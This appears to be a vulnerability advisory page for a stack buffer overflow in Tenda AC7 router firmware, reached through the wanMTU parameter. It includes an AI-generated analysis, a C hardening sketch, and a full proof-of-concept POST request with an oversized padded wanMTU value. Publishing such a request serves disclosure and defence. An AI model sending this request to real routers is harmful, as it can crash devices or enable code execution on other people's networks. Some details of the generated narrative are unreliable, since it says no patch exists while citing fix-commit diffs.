VYPR
Unrated severity · NVD Advisory · Published Jun 19, 2026 · Updated Jun 19, 2026

CVE-2026-51843

Description

Tenda AC7 v15.03.06.44 contains a stack buffer overflow vulnerability in the /goform/AdvSetMacMtuWan interface via the wanMTU parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

1

Vulnerability mechanics

Root cause

"The `check_param_changed` function uses the unsafe `strcpy` to copy the user-controlled `wanMTU` parameter into a fixed-size stack buffer without length validation, causing a stack buffer overflow."

Attack vector

An attacker on the same network as the router sends a crafted HTTP POST request to `/goform/AdvSetMacMtuWan` with an overly long `wanMTU` value [ref_id=1]. Because `strcpy` performs no bounds checking, the oversized input overflows the stack buffer, potentially leading to denial of service or remote code execution [ref_id=1]. The attacker must be able to reach the router's web interface (typically on the LAN side) and does not require authentication beyond the session cookie shown in the PoC [ref_id=1].

Affected code

The vulnerability resides in the `/goform/AdvSetMacMtuWan` interface of the Tenda AC7 router firmware v15.03.06.44. The `check_param_changed` function obtains the user-controlled `wanMTU` parameter and copies it into a stack buffer using the unsafe `strcpy` function, which does not validate or limit the length of the input data [ref_id=1].

What the fix does

The advisory does not provide a patch or official fix [ref_id=1]. To remediate the vulnerability, the developer should replace the unsafe `strcpy` call with a bounded copy function such as `strncpy` or `snprintf`, or validate the length of the `wanMTU` input before copying it into the stack buffer [ref_id=1]. Without such changes, the device remains vulnerable to stack buffer overflow attacks.
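The remediation described above, sketched as an added example; this is not Tenda's code and does not come from the advisory. The buffer size, the 576 to 1500 MTU range and all function names are assumptions, since the page gives none of them.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MTU_BUF_LEN 16   /* assumed size; the advisory does not state the real one */
#define MTU_MIN 576      /* assumed policy bounds for a WAN MTU */
#define MTU_MAX 1500

/* Pattern the advisory describes: unbounded copy of request data (not called here). */
void store_mtu_unsafe(char *dst /* MTU_BUF_LEN bytes */, const char *wan_mtu)
{
    strcpy(dst, wan_mtu);   /* writes past dst when strlen(wan_mtu) >= MTU_BUF_LEN */
}

/* Hardened form 1: bounded copy that rejects oversized input instead of
 * truncating it. snprintf always NUL-terminates; strncpy does not when the
 * source fills the buffer. Returns 0 on success, -1 on rejection. */
int store_mtu_bounded(char *dst, size_t dst_len, const char *wan_mtu)
{
    if (dst == NULL || dst_len == 0 || wan_mtu == NULL)
        return -1;
    int n = snprintf(dst, dst_len, "%s", wan_mtu);
    if (n < 0 || (size_t)n >= dst_len) {
        dst[0] = '\0';      /* do not keep a silently truncated value */
        return -1;
    }
    return 0;
}

/* Hardened form 2: validate wanMTU as the small integer it is meant to be.
 * Returns 0 and sets *mtu, or -1 for anything outside MTU_MIN..MTU_MAX. */
int parse_wan_mtu(const char *wan_mtu, int *mtu)
{
    char *end = NULL;
    if (wan_mtu == NULL || mtu == NULL || *wan_mtu < '0' || *wan_mtu > '9')
        return -1;          /* rejects empty, signed and space-padded input */
    errno = 0;
    long v = strtol(wan_mtu, &end, 10);
    if (errno != 0 || *end != '\0' || v < MTU_MIN || v > MTU_MAX)
        return -1;
    *mtu = (int)v;
    return 0;
}
```

Validating the value as an integer before any copy removes the need for a string buffer at all; the bounded copy is the fallback where the string form must be kept.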

Preconditions

  • network: Attacker must have network access to the router's web interface (typically on the LAN side, e.g., 192.168.0.1).
  • config: The router must be running Tenda AC7 firmware v15.03.06.44 (or earlier affected versions).
  • auth: The attacker must include a valid session cookie (e.g., password=pmp1qw) in the HTTP request.
  • input: The attacker sends a crafted POST request with an overly long wanMTU parameter.

Reproduction

The bundle includes a PoC HTTP request. An attacker can reproduce the overflow by sending the following POST request to the router:

``` POST /goform/AdvSetMacMtuWan HTTP/1.1 Host: 192.168.0.1 Content-Length: 712 X-Requested-With: XMLHttpRequest Accept-Language: zh-CN,zh;q=0.9 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Origin: http://192.168.0.1 Referer: http://192.168.0.1/mac_clone.html?random=0.6216016377171282& Accept-Encoding: gzip, deflate, br Cookie: password=pmp1qw Connection: keep-alive

wanMTU=1AAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&wanSpeed=0&cloneType=0&mac=B4:0F:3B:2E:64:19 ``` [ref_id=1]

Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1
